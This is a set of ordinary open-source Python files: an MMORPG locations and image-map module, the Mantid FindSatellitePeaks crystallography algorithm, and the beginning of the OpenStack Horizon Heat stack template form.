design.get("files").get("location-%s.png" % dest) else "/st/game/default-interface/%s.png" % dest arrows["loc_%s" % dest] = loc_id vars["location_arrows"] = arrows raise Hooks.Return(self.call("design.parse", design, "location-arrows.html", None, vars)) def hook_transitions(self, vars): req = self.req() character = self.character(req.user()) location = character.location design = self.design("gameinterface") transitions = [] for loc_id, info in location.transitions.iteritems(): if not info.get("show-trans", True): continue loc = self.location(loc_id) if not loc.valid(): continue transitions.append({ "loc": loc_id, "name": loc.name, }) if transitions: transitions.sort(cmp=lambda x, y: cmp(x["name"], y["name"])) transitions[-1]["lst"] = True vars["location_transitions"] = transitions raise Hooks.Return(self.call("design.parse", design, "location-transitions.html", None, vars)) def hook_name(self, vars, declension=None): req = self.req() character = self.character(req.user()) location = character.location if location is None: if declension == "w": name = self._("in the undefined location") else: name = self._("No location") elif declension == "w": name = location.name_w else: name = location.name declension = None raise Hooks.Return('<span class="location-name%s">%s</span>' % (('-%s' % declension) if declension else "", name)) def paid_services_available(self, services): services.append({"id": "fastmove", "type": "main"}) def money_description_fastmove(self): return { "args": ["period", "period_a"], "text": self._("Fast movement across the locations for {period}"), } def srv_fastmove(self): cur = self.call("money.real-currency") if not cur: return None cinfo = self.call("money.currency-info", cur) return { "id": "fastmove", "name": self._("Fast movement across the locations"), "description": self._("If you want to move across locations faster you may use this service"), "subscription": True, "type": "main", "default_period": 5 * 86400, "default_price": self.call("money.format-price", 30 / cinfo.get("real_roubles", 1), cur), "default_currency": cur, "default_enabled": True, } def movement_delay(self): delay = self.conf("locations.movement-delay") if delay is None: delay = ['/', ['glob', 'base_delay'], ['+', 1, ['.', ['.', ['glob', 'char'], 'mod'], 'fastmove']]] return delay class LocationsStaticImages(ConstructorModule): def register(self): self.rhook("locations.render", self.render) def render(self, location, vars): if location.image_type == "static": zones = [] if location.db_location.get("static_zones"): zone_id = 0 for zone in location.db_location.get("static_zones"): zone_id += 1 rzone = { "polygon": zone.get("polygon"), "action": zone.get("action", "none"), "loc": zone.get("loc"), "class": "loc-tr-%s" % zone.get("loc") if zone.get("action") == "move" else "loc-zone-%d" % zone_id, "hint": htmlescape(jsencode(zone.get("hint"))), } if zone.get("url"): rzone["url"] = htmlescape(jsencode(zone.get("url"))) m = hashlib.md5() m.update(utf2str(zone.get("url"))) rzone["urlhash"] = m.hexdigest() self.call("locations.map-zone-%s-render" % rzone["action"], zone, rzone) zones.append(rzone) vars["loc"] = { "id": location.uuid, "image": location.db_location.get("image_static"), } vars["zones"] = zones self.render_stretch(location, vars) design = self.design("gameinterface") raise Hooks.Return(self.call("design.parse", design, "location-static.html", None, vars)) def render_stretch(self, location, vars): loc_init = vars.get("loc_init", []) vars["loc_init"] = loc_init if location.db_location.get("image_static_stretch"): margin_x = location.db_location.get("image_static_margin_x", 200) margin_y = location.db_location.get("image_static_margin_y", 80) loc_init.append("Loc.margins(%d, %d);" % (margin_x, margin_y)) width = location.db_location.get("image_static_w", 1) height = location.db_location.get("image_static_h", 1) loc_init.append("Loc.stretch(%d, %d);" % (width, height)) # HTML5 Canvas class LocationsCanvas(LocationsStaticImages): def register(self): self.rhook("locations.render", self.render) def render(self, location, vars): if location.image_type == "canvas": vars["loc"] = { "id": location.uuid, "image": location.db_location.get("image_static"), "image_w": location.db_location.get("image_static_w"), "image_h": location.db_location.get("image_static_h"), } vars["loc_modules"].add("loccanvas"); design = self.design("gameinterface") req = self.req() if req.param("saved"): vars["saved"] = {"text": self._("Location data saved successfully")} self.render_stretch(location, vars) raise Hooks.Return(self.call("design.parse", design, "location-canvas.html", None, vars)) class LocationsCanvasAdmin(ConstructorModule): def register(self): self.rhook("admin-locations.editor-form-render", self.form_render, priority=-5) self.rhook("admin-locations.editor-form-validate", self.form_validate) self.rhook("admin-locations.render", self.render) def form_render(self, db_loc, fields): for fld in fields: if fld.get("name") == "image_type": fld["values"].append(("canvas", self._("HTML5 Canvas"))) def form_validate(self, db_loc, flags, errors): req = self.req() if db_loc.get("image_static"): flags["old_image_static"] = db_loc.get("image_static") if req.param("v_image_type") == "canvas": flags["image_type_valid"] = True def render(self, location, fields): if location.image_type == "canvas": vars = { "loc": { "id": location.uuid, "image": location.db_location.get("image_static"), } } req = self.req() if req.param("saved"): vars["saved"] = {"text": self._("Location data saved successfully")} fields.insert(0, {"type": "html", "html": self.call("web.parse_layout", "admin/locations/imagemap-render.html", vars)}) class ImageMapEditor(ConstructorModule): def __init__(self, app, location, fqn="mg.mmorpg.locations.ImageMapEditor"): ConstructorModule.__init__(self, app, fqn) self._location = location def submit(self, zones): req = self.req() errors = {} for key in req.param_dict().keys(): m = re_polygon_param.match(key) if m: zone_id = int(m.group(1)) zone = {} zones[zone_id] = zone # polygon data zone["polygon"] = req.param("polygon-%d" % zone_id) poly = zone["polygon"].split(",") if len(poly) == 0: errors["polygon-%d" % zone_id] = self._("Polygon may not be empty") elif len(poly) % 2: errors["polygon-%d" % zone_id] = self._("Odd number of coordinates") elif len(poly) < 6: errors["polygon-%d" % zone_id] = self._("Minimal number of points is 3") else: for coo in poly: if not valid_int(coo): errors["polygon-%d" % zone_id] = self._("Invalid non-integer coordinate encountered") break # action action = req.param("v_action-%d" % zone_id) zone["action"] = action if action == "move": loc = req.param("v_location-%d" % zone_id) if not loc: errors["v_location-%d" % zone_id] = self._("Location not specified") else: loc_obj = self.location(loc) if not loc_obj.valid(): errors["v_location-%d" % zone_id] = self._("Invalid location specified") elif loc_obj.uuid == self._location.uuid: errors["v_location-%d" % zone_id] = self._("Link to the same location") else: zone["loc"] = loc elif action == "open": url = req.param("url-%d" % zone_id) if not url: errors["url-%d" % zone_id] = self._("This field is mandatory") elif not url.startswith("/"): errors["url-%d" % zone_id] = self._("URL must start with '/'") else: zone["url"] = url elif not self.call("admin-locations.map-zone-action-%s" % action, zone_id, zone, errors): if "action" in zone: del zone["action"] # hint hint = req.param("hint-%d" % zone_id) zone["hint"] = hint if len(errors): self.call("web.response_json", {"success": False, "errors": errors}) def render_form(self, static_zones, image, width, height): req = self.req() # Loading zones zones = [] if static_zones: for zone in static_zones: rzone = { "polygon": zone.get("polygon"), "action": zone.get("action", "none"), "loc": zone.get("loc"), "url": jsencode(zone.get("url")), "hint": jsencode(zone.get("hint")), } self.call("admin-locations.map-zone-%s-render" % rzone["action"], zone, rzone) zones.append(rzone) # Loading locations locations = [] lst = self.objlist(DBLocationList, query_index="all") lst.load() for db_loc in lst: if db_loc.uuid != self._location.uuid: locations.append({ "id": db_loc.uuid, "name": jsencode(db_loc.get("name")) }) actions = [("none", self._("No action")), ("move", self._("Move to another location")), ("open", self._("Open URL"))] self.call("admin-locations.map-zone-actions", self._location, actions) links = [] self.call("admin-locations.render-links", self._location, links) vars = { "image": image, "width": width, "height": height, "ie_warning": self._("Warning! Internet Explorer browser is not supported. Location editor may work slowly and unstable. Mozilla Firefox, Google Chrome and Opera are fully supported"), "submit_url": "/%s/%s/%s" % (req.group, req.hook, req.args), "zones": zones, "actions": actions, "locations": locations, "links": links, } if req.param("saved"): vars["saved"] = {"text": self._("Location saved successfully")} self.call("admin-locations.render-imagemap-editor", self._location, vars) self.call("admin.response_template", "admin/locations/imagemap.html", vars) class LocationsStaticImagesAdmin(ConstructorModule): def register(self): self.rhook("admin-locations.editor-form-render", self.form_render) self.rhook("admin-locations.editor-form-validate", self.form_validate) self.rhook("admin-locations.editor-form-store", self.form_store) self.rhook("admin-locations.editor-form-cleanup", self.form_cleanup) self.rhook("admin-locations.render", self.render) self.rhook("admin-locations.valid-transitions", self.valid_transitions) self.rhook("admin-locations.links", self.links) self.rhook("ext-admin-locations.image-map", self.admin_image_map, priv="locations.editor") self.rhook("headmenu-admin-locations.image-map", self.headmenu_image_map) def form_render(self, db_loc, fields): for fld in fields: if fld.get("name") == "image_type": fld["values"].append(("static", self._("Static image"))) fields.append({"name": "image_static", "type": "fileuploadfield", "label": self._("Replace location image (if necessary)") if db_loc.get("image_static") else self._("Upload location image"), "condition": "[image_type]=='static' || [image_type]=='canvas'"}) fields.append({"type": "header", "html": self._("Resizing"), "condition": "[image_type]=='static' || [image_type]=='canvas'"}) fields.append({"name": "image_static_stretch", "type": "checkbox", "label": self._("Resize image to fill entire frame"), "checked": db_loc.get("image_static_stretch"), "condition": "[image_type]=='static' || [image_type]=='canvas'"}) fields.append({"name": "image_static_margin_x", "label": self._("X frame margin"), "value": db_loc.get("image_static_margin_x", 200), "condition": "([image_type]=='static' || [image_type]=='canvas') && [image_static_stretch] || [image_type]=='multistatic'"}) fields.append({"name": "image_static_margin_y", "label": self._("Y frame margin"), "value": db_loc.get("image_static_margin_y", 80), "condition": "([image_type]=='static' || [image_type]=='canvas') && [image_static_stretch] || [image_type]=='multistatic'", "inline": True}) def form_validate(self, db_loc, flags, errors): req = self.req() if db_loc.get("image_static"): flags["old_image_static"] = db_loc.get("image_static") if req.param("v_image_type") == "static": flags["image_type_valid"] = True if req.param("v_image_type") == "static" or req.param("v_image_type") == "canvas": image_data = req.param_raw("image_static") if image_data: try: image_obj = Image.open(cStringIO.StringIO(image_data)) if image_obj.load() is None: raise IOError except IOError: errors["image_static"] = self._("Image format not recognized") except OverflowError: errors["image_static"] = self._("Image format not recognized") else: width, height = image_obj.size flags["image_static"] = image_data flags["image_static_w"] = width flags["image_static_h"] = height if image_obj.format == "GIF": flags["image_static_ext"] = "gif" flags["image_static_content_type"] = "image/gif" elif image_obj.format == "PNG": flags["image_static_ext"] = "png" flags["image_static_content_type"] = "image/png" elif image_obj.format == "JPEG": flags["image_static_ext"] = "jpg" flags["image_static_content_type"] = "image/jpeg" else: del flags["image_static"] del flags["image_static_w"] del flags["image_static_h"] errors["image_static"] = self._("Image format must be GIF, JPEG or PNG") else: if db_loc.get("image_static"): flags["old_image_static"] = db_loc.get("image_static") else: errors["image_static"] = self._("Upload an image") else: db_loc.delkey("image_static") db_loc.delkey("image_static_w") db_loc.delkey("image_static_h") def form_store(self, db_loc, flags): req = self.req() if flags.get("image_static"): uri = self.call("cluster.static_upload", "locations", flags["image_static_ext"], flags["image_static_content_type"], flags["image_static"]) db_loc.set("image_static", uri) db_loc.set("image_static_w", flags["image_static_w"]) db_loc.set("image_static_h", flags["image_static_h"]) if db_loc.get("image_static") and req.param("image_static_stretch") or db_loc.get("images_multistatic"): db_loc.set("image_static_stretch", True) db_loc.set("image_static_margin_x", intz(req.param("image_static_margin_x"))) db_loc.set("image_static_margin_y", intz(req.param("image_static_margin_y"))) else: db_loc.delkey("image_static_stretch") db_loc.delkey("image_static_margin_x") db_loc.delkey("image_static_margin_y") def form_cleanup(self, db_loc, flags): if flags.get("old_image_static") and db_loc.get("image_static") != flags["old_image_static"]: self.call("cluster.static_delete", flags["old_image_static"]) def headmenu_image_map(self, args): return [self._("Map"), "locations/editor/%s" % args] def admin_image_map(self): req = self.req() location = self.location(req.args) if not location.valid() or location.image_type != "static": self.call("admin.redirect", "locations/editor") imagemap_editor = ImageMapEditor(self.app(), location) if req.ok(): zones = {} imagemap_editor.submit(zones) location.db_location.set("static_zones", [zones[zone_id] for zone_id in sorted(zones.keys())]) self.call("admin-locations.update-transitions", location.db_location) location.db_location.store() self.call("web.response_json", {"success": True, "redirect": "locations/image-map/%s" % location.uuid, "parameters": {"saved": 1}}) static_zones = location.db_location.get("static_zones") image = location.db_location.get("image_static") width = location.db_location.get("image_static_w") height = location.db_location.get("image_static_h") imagemap_editor.render_form(static_zones, image, width, height) def links(self, location, links): req = self.req() if req.has_access("locations.editor"): if location.image_type == "static": links.append({"hook": "locations/image-map/%s" % location.uuid, "text": self._("imagemap///Map")}) def render(self, location, fields): if location.image_type == "static": zones = [] if location.db_location.get("static_zones"): for zone in location.db_location.get("static_zones"): zones.append({ "polygon": zone.get("polygon"), "action": zone.get("action"), "loc": zone.get("loc"), }) vars = { "loc": { "id": location.uuid, "image": location.db_location.get("image_static"), }, "zones": zones, } req = self.req() if req.param("saved"): vars["saved"] = {"text": self._("Location data saved successfully")} fields.insert(0, {"type": "html", "html": self.call("web.parse_layout", "admin/locations/imagemap-render.html", vars)}) def valid_transitions(self, db_loc, valid_transitions): if db_loc.get("image_type") == "static": if db_loc.get("static_zones"): for zone in db_loc.get("static_zones"): if zone.get("action") == "move" and zone.get("loc"): valid_transitions.add(zone.get("loc")) # Multiple static images for different resolutions class LocationsMultiStaticImages(ConstructorModule): def register(self): self.rhook("locations.render", self.render) def render(self, location, vars): if location.image_type == "multistatic": # initialization script loc_init = vars.get("loc_init", []) vars["loc_init"] = loc_init margin_x = location.db_location.get("image_static_margin_x", 200) margin_y = location.db_location.get("image_static_margin_y", 80) loc_init.append("Loc.margins(%d, %d);" % (margin_x, margin_y)) # images images = [] for img in location.db_location.get("images_multistatic", []): zones = [] zone_id = 0 for zone in img.get("zones", []): zone_id += 1 rzone = { "polygon": zone.get("polygon"), "action": zone.get("action", "none"), "loc": zone.get("loc"), "class": "loc-tr-%s" % zone.get("loc") if zone.get("action") == "move" else "loc-zone-%d" % zone_id, "hint": htmlescape(jsencode(zone.get("hint"))), } if zone.get("url"): rzone["url"] = htmlescape(jsencode(zone.get("url"))) m = hashlib.md5() m.update(utf2str(zone.get("url"))) rzone["urlhash"] = m.hexdigest() self.call("locations.map-zone-%s-render" % rzone["action"], zone, rzone) zones.append(rzone) rimage = { "id": img["uuid"], "zones": zones, "image": img.get("uri"), } images.append(rimage) loc_init.append("Loc.multiimage({width: %d, height: %s, id: '%s'});" % (img["width"], img["height"], img["uuid"])) vars["loc"] = { "id": location.uuid, "image": location.db_location.get("image_static"), } vars["images"] = images design = self.design("gameinterface") raise Hooks.Return(self.call("design.parse", design, "location-multistatic.html", None, vars)) class LocationsMultiStaticImagesAdmin(ConstructorModule): def register(self): self.rhook("admin-locations.editor-form-render", self.form_render) self.rhook("admin-locations.editor-form-validate", self.form_validate) self.rhook("admin-locations.editor-form-store", self.form_store) self.rhook("admin-locations.editor-form-cleanup", self.form_cleanup) self.rhook("admin-locations.render", self.render) self.rhook("admin-locations.valid-transitions", self.valid_transitions) self.rhook("admin-locations.links", self.links) self.rhook("ext-admin-locations.multiimage-map", self.admin_multiimage_map, priv="locations.editor") self.rhook("headmenu-admin-locations.multiimage-map", self.headmenu_multiimage_map) def form_render(self, db_loc, fields): for fld in fields: if fld.get("name") == "image_type": fld["values"].append(("multistatic", self._("Multiple static images with different dimensions"))) fields.append({"name": "image_multistatic", "type": "fileuploadfield", "label": self._("Add location image with different dimension") if db_loc.get("images_multistatic") else self._("Upload first location image"), "condition": "[image_type]=='multistatic'"}) def form_validate(self, db_loc, flags, errors): req = self.req() if req.param("v_image_type") == "multistatic": flags["image_type_valid"] = True image_data = req.param_raw("image_multistatic") if image_data: try: image_obj = Image.open(cStringIO.StringIO(image_data)) if image_obj.load() is None: raise IOError except IOError: errors["image_multistatic"] = self._("Image format not recognized") except OverflowError: errors["image_multistatic"] = self._("Image format not recognized") else: width, height = image_obj.size flags["image_multistatic"] = image_data flags["image_multistatic_w"] = width flags["image_multistatic_h"] = height if image_obj.format == "GIF": flags["image_multistatic_ext"] = "gif" flags["image_multistatic_content_type"] = "image/gif" elif image_obj.format == "PNG": flags["image_multistatic_ext"] = "png" flags["image_multistatic_content_type"] = "image/png" elif image_obj.format == "JPEG": flags["image_multistatic_ext"] = "jpg" flags["image_multistatic_content_type"] = "image/jpeg" else: del flags["image_multistatic"] del flags["image_multistatic_w"] del flags["image_multistatic_h"] errors["image_multistatic"] = self._("Image format must be GIF, JPEG or PNG") else: if not db_loc.get("images_multistatic"): errors["image_multistatic"] = self._("Upload an image") else: images = db_loc.get("images_multistatic") if images: flags["old_images_multistatic"] = images db_loc.delkey("images_multistatic") def form_store(self, db_loc, flags): if flags.get("image_multistatic"): uri = self.call("cluster.static_upload", "locations", flags["image_multistatic_ext"], flags["image_multistatic_content_type"], flags["image_multistatic"]) images = db_loc.get("images_multistatic", []) images.append({ "uuid": uuid4().hex, "uri": uri, "width": flags["image_multistatic_w"], "height": flags["image_multistatic_h"], }) images.sort(cmp=lambda x, y: cmp(x["width"] + x["height"], y["width"] + y["height"])) db_loc.set("images_multistatic", images) db_loc.touch() def form_cleanup(self, db_loc, flags): old_images = flags.get("old_images_multistatic") if old_images: for img in old_images: self.call("cluster.static_delete", img["uri"]) def links(self, location, links): req = self.req() order = 0 if req.has_access("locations.editor"): if location.image_type == "multistatic": for img in location.db_location.get("images_multistatic", []): links.append({"hook": "locations/multiimage-map/%s/%s" % (location.uuid, img["uuid"]), "text": self._("imagemap///Map {width}x{height}").format(width=img["width"], height=img["height"]), "order": order}) order += 0.001 def render(self, location, fields): if location.image_type == "multistatic": images = [] for img in location.db_location.get("images_multistatic", []): zones = [] if img.get("zones"): for zone in img.get("zones"): zones.append({ "polygon": zone.get("polygon"), "action": zone.get("action"), "loc": zone.get("loc"), }) images.append({ "uuid": img["uuid"], "uri": img["uri"], "width": img["width"], "height": img["height"], "zones": zones }) if images: images[-1]["lst"] = True vars = { "loc": { "id": location.uuid, "images": images, }, } req = self.req() if req.param("saved"): vars["saved"] = {"text": self._("Location data saved successfully")} fields.insert(0, {"type": "html", "html": self.call("web.parse_layout", "admin/locations/multiimagemap-render.html", vars)}) tabs = [] active_tab = None for img in images: tab_id = "locimg-%s" % img["uuid"] if active_tab is None: active_tab = 0 delete = "locations/multiimage-map/%s/del/%s" % (location.uuid, img["uuid"]) tabs.append({ "title": "%dx%d" % (img["width"], img["height"]), "bodyStyle": "padding: 10px", "tabId": tab_id, "autoScroll": True, "autoHeight": True, "items": [{ "xtype": "box", "cls": "admin-submenu", "html": u'<a href="/admin#%s" onclick="if (confirm(\'%s\')) { adm(\'%s\'); } return false">%s</a>' % (delete, jsencode(self._("Are you sure want do delete this image?")), delete, self._("Delete this image")), }, { "xtype": "box", "html": u'<img src="%s" alt="" usemap="#locmap-%s-%s" style="width: %dpx; height: %dpx;" />' % (img["uri"], location.uuid, img["uuid"], img["width"], img["height"]), }] }) fields.insert(1, {"type": "component", "component": { "xtype": "tabpanel", "id": "multiimages-panel", "items": tabs, "activeTab": active_tab, "autoHeight": True, }}) def valid_transitions(self, db_loc, valid_transitions): if db_loc.get("image_type") == "multistatic": for img in db_loc.get("images_multistatic", []): for zone in img.get("zones", []): if zone.get("action") == "move" and zone.get("loc"): valid_transitions.add(zone.get("loc")) def headmenu_multiimage_map(self, args): m = re_multiimage_map.match(args) if m: loc_uuid, img_uuid = m.group(1, 2) location = self.location(loc_uuid) if location.valid and location.image_type == "multistatic": for img in location.db_location.get("images_multistatic", []): if img["uuid"] == img_uuid: return [self._("imagemap///Map {width}x{height}").format(width=img["width"], height=img["height"]), "locations/editor/%s" % loc_uuid] def admin_multiimage_map(self): req = self.req() m = re_multiimage_map_del.match(req.args) if m: loc_uuid, img_uuid = m.group(1, 2) location = self.location(loc_uuid) if not location.valid() or location.image_type != "multistatic": self.call("admin.redirect", "locations/editor") images = location.db_location.get("images_multistatic", []) for img in images: if img["uuid"] == img_uuid: images = [i for i in images if i["uuid"] != img_uuid] location.db_location.set("images_multistatic", images) self.call("admin-locations.update-transitions", location.db_location) location.db_location.store() self.call("cluster.static_delete", img["uri"]) break self.call("admin.redirect", "locations/editor/%s" % loc_uuid) m = re_multiimage_map.match(req.args) if not m: self.call("admin.redirect", "locations/editor") loc_uuid, img_uuid = m.group(1, 2) location = self.location(loc_uuid) if not location.valid() or location.image_type != "multistatic": self.call("admin.redirect", "locations/editor") img = None for i in location.db_location.get("images_multistatic", []): if i["uuid"] == img_uuid: img = i break if not img: self.call("admin.redirect", "locations/editor/%s" % loc_uuid) imagemap_editor = ImageMapEditor(self.app(), location) if req.ok(): zones = {} imagemap_editor.submit(zones) img["zones"] = [zones[zone_id] for zone_id in sorted(zones.keys())] self.call("admin-locations.update-transitions", location.db_location) location.db_location.touch() location.db_location.store() self.call("web.response_json", {"success": True, "redirect": "locations/multiimage-map/%s/%s" % (location.uuid, img_uuid), "parameters": {"saved": 1}}) static_zones = img.get("zones") image = img.get("uri") width = img.get("width") height = img.get("height") imagemap_editor.render_form(static_zones, image, width, height)
gpl-3.0
peterfpeterson/mantid
Framework/PythonInterface/plugins/algorithms/FindSatellitePeaks.py
3
7278
# Mantid Repository : https://github.com/mantidproject/mantid # # Copyright &copy; 2018 ISIS Rutherford Appleton Laboratory UKRI, # NScD Oak Ridge National Laboratory, European Spallation Source, # Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS # SPDX - License - Identifier: GPL - 3.0 + from mantid.kernel import * from mantid.dataobjects import PeaksWorkspaceProperty from mantid.api import * from mantid.simpleapi import * import fractional_indexing as indexing class FindSatellitePeaks(DataProcessorAlgorithm): def category(self): return 'Crystal\\Peaks' def seeAlso(self): return [ "IndexSatellitePeaks" ] def name(self): return "FindSatellitePeaks" def summary(self): return "Algorithm for finding satellite peaks in an MDWorkspace in the HKL frame." def PyInit(self): self.declareProperty(PeaksWorkspaceProperty(name="NuclearPeaks", defaultValue="", direction=Direction.Input), doc="Main integer HKL peaks. Q vectors will be calculated relative to these peaks.") self.declareProperty(PeaksWorkspaceProperty(name="SatellitePeaks", defaultValue="", direction=Direction.Input), doc="Positions of seed satellite peaks. These will be used to define the modulation (q) \ vectors for each satellite.") self.declareProperty(WorkspaceProperty(name="MDWorkspace", defaultValue="", direction=Direction.Input, validator=MDFrameValidator("HKL")), doc="MD workspace to search for satellites peak in. This data must be in the HKL frame.") self.declareProperty(PeaksWorkspaceProperty(name="OutputWorkspace", defaultValue="", direction=Direction.Output), doc="All found satellite peaks. These will be given with satellite coordinates.") self.declareProperty('NumOfQs', -1, direction=Direction.Input, doc="The number of satellite peaks to look for. If this option is not set to the default then all the \ provided satellites will be grouped into exactly this number of modulation (q) vectors") self.declareProperty('ClusterThreshold', 1.5, direction=Direction.Input, doc="Threshold for automaticallty deciding on the number of modulation (q) vectors to use. If NumOfQs found is set then this \ is property is ignored.") self.declareProperty('PeakRadius', 0.1, direction=Direction.Input, doc="The peak radius used to integrate the satellite peaks. This is Euclidean distance in HKL space. \ This is passed directly to IntegratePeaksMD") self.declareProperty('BackgroundInnerRadius', 0.1, direction=Direction.Input, doc="The inner background radius used to integrate the satellite peaks. This is Euclidean distance in HKL space. This is passed directly to \ IntegratePeaksMD") self.declareProperty('BackgroundOuterRadius', 0.2, direction=Direction.Input, doc="The outer background radius used to integrate satellite peaks. TThis is Euclidean distance in HKL space. his is passed directly to \ IntegratePeaksMD") self.declareProperty('IOverSigma', 2, direction=Direction.Input, doc="The I/sigma threshold use to identify if peaks exist. This is passed direclty to FilterPeaks") def PyExec(self): k = self.getProperty("NumOfQs").value peak_radius = self.getProperty("PeakRadius").value background_radii = (self.getProperty("BackgroundInnerRadius").value, self.getProperty("BackgroundOuterRadius").value) I_over_sigma = self.getProperty("IOverSigma").value cluster_threshold = self.getProperty("ClusterThreshold").value # if user did not specify the number of qs then # set the k value to None if k == -1: k = None md = self.getProperty("MDWorkspace").value nuclear = self.getProperty("NuclearPeaks").value sats = self.getProperty("SatellitePeaks").value nuclear_hkls = indexing.get_hkls(nuclear) sats_hkls = indexing.get_hkls(sats) qs = indexing.find_q_vectors(nuclear_hkls, sats_hkls) clusters, k = indexing.cluster_qs(qs, threshold=cluster_threshold, k=k) qs = indexing.average_clusters(qs, clusters) predicted_satellites = self.create_fractional_peaks_workspace(qs, nuclear) centroid_satellites = CentroidPeaksMD(InputWorkspace=md, PeaksWorkspace=predicted_satellites, PeakRadius=peak_radius, StoreInADS=False) satellites_int_spherical = IntegratePeaksMD(InputWorkspace=md, PeaksWorkspace=centroid_satellites, PeakRadius=peak_radius, BackgroundInnerRadius=background_radii[0], BackgroundOuterRadius=background_radii[1], IntegrateIfOnEdge=True, StoreInADS=False) satellites_int_spherical = FilterPeaks(satellites_int_spherical, FilterVariable="Intensity", FilterValue=0, Operator=">", StoreInADS=False) satellites_int_spherical = FilterPeaks(satellites_int_spherical, FilterVariable="Signal/Noise", FilterValue=I_over_sigma, Operator=">", StoreInADS=False) self.log().notice("Q vectors are: \n{}".format(qs)) self.setProperty("OutputWorkspace", satellites_int_spherical) def create_fractional_peaks_workspace(self, qs, nuclear): """Generate a peaks workspace of possible satellite peaks from a list of q vectors. :param qs: list of q vectors to use to generate fractional peaks. :param nuclear: list of integer HKL peak positions. :returns: PeaksWorkspace -- containing predicted locations of satellite peaks. """ predicted_satellites = CloneWorkspace(nuclear, StoreInADS=False) for _ in range(predicted_satellites.getNumberPeaks()): predicted_satellites.removePeak(0) for q in qs: predicted_q = PredictFractionalPeaks(nuclear, HOffset=q[0], KOffset=q[1], LOffset=q[2], StoreInADS=False, FracPeaks='predicted_q') predicted_satellites = CombinePeaksWorkspaces(predicted_satellites, predicted_q, StoreInADS=False, OutputWorkspace='predicted_satellites') return predicted_satellites AlgorithmFactory.subscribe(FindSatellitePeaks)
gpl-3.0
Daniex/horizon
openstack_dashboard/dashboards/project/stacks/forms.py
24
18343
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import json import logging from django.utils import html from django.utils.translation import ugettext_lazy as _ from django.views.decorators.debug import sensitive_variables # noqa from oslo_utils import strutils import six from horizon import exceptions from horizon import forms from horizon import messages from openstack_dashboard import api from openstack_dashboard.dashboards.project.images \ import utils as image_utils from openstack_dashboard.dashboards.project.instances \ import utils as instance_utils LOG = logging.getLogger(__name__) def create_upload_form_attributes(prefix, input_type, name): """Creates attribute dicts for the switchable upload form :type prefix: str :param prefix: prefix (environment, template) of field :type input_type: str :param input_type: field type (file, raw, url) :type name: str :param name: translated text label to display to user :rtype: dict :return: an attribute set to pass to form build """ attributes = {'class': 'switched', 'data-switch-on': prefix + 'source'} attributes['data-' + prefix + 'source-' + input_type] = name return attributes class TemplateForm(forms.SelfHandlingForm): class Meta(object): name = _('Select Template') help_text = _('Select a template to launch a stack.') # TODO(jomara) - update URL choice for template & environment files # w/ client side download when applicable base_choices = [('file', _('File')), ('raw', _('Direct Input'))] url_choice = [('url', _('URL'))] attributes = {'class': 'switchable', 'data-slug': 'templatesource'} template_source = forms.ChoiceField(label=_('Template Source'), choices=base_choices + url_choice, widget=forms.Select(attrs=attributes)) attributes = create_upload_form_attributes( 'template', 'file', _('Template File')) template_upload = forms.FileField( label=_('Template File'), help_text=_('A local template to upload.'), widget=forms.FileInput(attrs=attributes), required=False) attributes = create_upload_form_attributes( 'template', 'url', _('Template URL')) template_url = forms.URLField( label=_('Template URL'), help_text=_('An external (HTTP) URL to load the template from.'), widget=forms.TextInput(attrs=attributes), required=False) attributes = create_upload_form_attributes( 'template', 'raw', _('Template Data')) template_data = forms.CharField( label=_('Template Data'), help_text=_('The raw contents of the template.'), widget=forms.widgets.Textarea(attrs=attributes), required=False) attributes = {'data-slug': 'envsource', 'class': 'switchable'} environment_source = forms.ChoiceField( label=_('Environment Source'), choices=base_choices, widget=forms.Select(attrs=attributes), required=False) attributes = create_upload_form_attributes( 'env', 'file', _('Environment File')) environment_upload = forms.FileField( label=_('Environment File'), help_text=_('A local environment to upload.'), widget=forms.FileInput(attrs=attributes), required=False) attributes = create_upload_form_attributes( 'env', 'raw', _('Environment Data')) environment_data = forms.CharField( label=_('Environment Data'), help_text=_('The raw contents of the environment file.'), widget=forms.widgets.Textarea(attrs=attributes), required=False) def __init__(self, *args, **kwargs): self.next_view = kwargs.pop('next_view') super(TemplateForm, self).__init__(*args, **kwargs) def clean(self): cleaned = super(TemplateForm, self).clean() files = self.request.FILES self.clean_uploaded_files('template', _('template'), cleaned, files) self.clean_uploaded_files('environment', _('environment'), cleaned, files) # Validate the template and get back the params. kwargs = {} if cleaned['template_data']: kwargs['template'] = cleaned['template_data'] else: kwargs['template_url'] = cleaned['template_url'] if cleaned['environment_data']: kwargs['environment'] = cleaned['environment_data'] try: validated = api.heat.template_validate(self.request, **kwargs) cleaned['template_validate'] = validated except Exception as e: raise forms.ValidationError(unicode(e)) return cleaned def clean_uploaded_files(self, prefix, field_label, cleaned, files): """Cleans Template & Environment data from form upload. Does some of the crunchy bits for processing uploads vs raw data depending on what the user specified. Identical process for environment data & template data. :type prefix: str :param prefix: prefix (environment, template) of field :type field_label: str :param field_label: translated prefix str for messages :type input_type: dict :param prefix: existing cleaned fields from form :rtype: dict :return: cleaned dict including environment & template data """ upload_str = prefix + "_upload" data_str = prefix + "_data" url = cleaned.get(prefix + '_url') data = cleaned.get(prefix + '_data') has_upload = upload_str in files # Uploaded file handler if has_upload and not url: log_template_name = files[upload_str].name LOG.info('got upload %s' % log_template_name) tpl = files[upload_str].read() if tpl.startswith('{'): try: json.loads(tpl) except Exception as e: msg = _('There was a problem parsing the' ' %(prefix)s: %(error)s') msg = msg % {'prefix': prefix, 'error': e} raise forms.ValidationError(msg) cleaned[data_str] = tpl # URL handler elif url and (has_upload or data): msg = _('Please specify a %s using only one source method.') msg = msg % field_label raise forms.ValidationError(msg) elif prefix == 'template': # Check for raw template input - blank environment allowed if not url and not data: msg = _('You must specify a template via one of the ' 'available sources.') raise forms.ValidationError(msg) def create_kwargs(self, data): kwargs = {'parameters': data['template_validate'], 'environment_data': data['environment_data'], 'template_data': data['template_data'], 'template_url': data['template_url']} if data.get('stack_id'): kwargs['stack_id'] = data['stack_id'] return kwargs def handle(self, request, data): kwargs = self.create_kwargs(data) # NOTE (gabriel): This is a bit of a hack, essentially rewriting this # request so that we can chain it as an input to the next view... # but hey, it totally works. request.method = 'GET' return self.next_view.as_view()(request, **kwargs) class 